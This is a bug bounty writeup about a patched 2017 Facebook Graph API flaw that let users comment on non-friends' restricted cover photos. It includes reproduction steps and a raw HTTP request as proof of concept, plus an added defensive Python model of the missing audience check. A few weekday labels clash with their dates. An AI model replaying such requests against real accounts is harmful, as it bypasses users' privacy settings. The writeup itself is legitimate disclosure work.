Hello guys,
Wednesday, May 11, 2017 at 12:24am: $500 rewarded ☺
It's my first writeup, so first let me introduce myself to you guys. I am Asadul (16) from Dhaka, Bangladesh. Last month I found a privacy bug on Facebook. The bug is commenting on a non-friend's cover photo using the Graph API. Through the bug, an attacker could have commented on a non-friend's cover photo even after the victim has set his "Public Info" to "Friends".
Steps to reproduce:
1: First grab the cover photo ID.
2: Now go to the Graph API Explorer (developers.facebook.com/tools/explorer/).
3: Get your access token.
4: Now make a POST request using the reference below.
Reference: https://developers.facebook.com/docs/graph-api/reference/object/comments
This is how mine looked:
POST /v2.9/<PHOTO ID>/comments?access_token=<*****************************> HTTP/1.1
Host: graph.facebook.com
Connection: close
Content-Length: 76
Origin: https://developers.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: https://developers.facebook.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8

debug=all&format=json&message=<YOUR COMMENT>&method=post&pretty=0&suppress_http_code=1
Now you'll get a response with the comment ID.
That's all! You're done!
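The missing check behind this bug, as an added example (not part of the original post and not Facebook's code): a toy model in which the comment write path skips the audience check, next to a hardened version that applies it before any state change. The `User` and `Photo` classes, the audience values and the comment ID format are assumptions made for the illustration.

```python
# Toy model, constructed for illustration; not Facebook's code or data model.
from dataclasses import dataclass, field

@dataclass
class User:
    uid: str
    friends: set = field(default_factory=set)

@dataclass
class Photo:
    pid: str
    owner: User
    audience: str  # "public" or "friends" (assumed audience values)
    comments: list = field(default_factory=list)

class Forbidden(Exception): ...  # caller is not in the object's audience

def in_audience(viewer: User, photo: Photo) -> bool:
    """Single audience check, meant to be shared by read and write paths."""
    if viewer.uid == photo.owner.uid or photo.audience == "public":
        return True
    return photo.audience == "friends" and viewer.uid in photo.owner.friends

def comment_unchecked(viewer: User, photo: Photo, message: str) -> str:
    """Bug class from the writeup: the audience setting is never consulted."""
    photo.comments.append((viewer.uid, message))
    return f"{photo.pid}_{len(photo.comments)}"  # constructed comment ID format

def comment_checked(viewer: User, photo: Photo, message: str) -> str:
    """Hardened write path: refuse before any state change."""
    if not in_audience(viewer, photo):
        raise Forbidden(f"{viewer.uid} is not in the audience of {photo.pid}")
    photo.comments.append((viewer.uid, message))
    return f"{photo.pid}_{len(photo.comments)}"

def demo() -> dict:
    owner = User("owner", friends={"friend"})
    cover = Photo("cover1", owner, audience="friends")
    stranger, friend = User("stranger"), User("friend")
    result = {"unchecked": comment_unchecked(stranger, cover, "hi")}
    try:
        comment_checked(stranger, cover, "hi")
        result["stranger_blocked"] = False
    except Forbidden:
        result["stranger_blocked"] = True
    result["friend"] = comment_checked(friend, cover, "nice")
    return result

if __name__ == "__main__":
    print(demo())
```

A regression test for this class of bug exercises every write endpoint on an object (comment, like, tag) with a caller outside the audience and expects the same refusal the read path gives.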
Timeline:
Monday, April 10, 2017 at 4:05pm: Report sent.
Monday, April 10, 2017 at 10:40pm: PoC sent.
Tuesday, April 18, 2017 at 3:38am: Triaged.
Tuesday, May 10, 2017 at 12:59am: Patched.
Tuesday, May 10, 2017 at 1:19am: Fix confirmed.
I would like to thank ALMIGHTY ALLAH.
Also my family and friends.
Special thanks to Rohan Das and Philippe Harewood.
Stay tuned, I'll post another finding of mine :)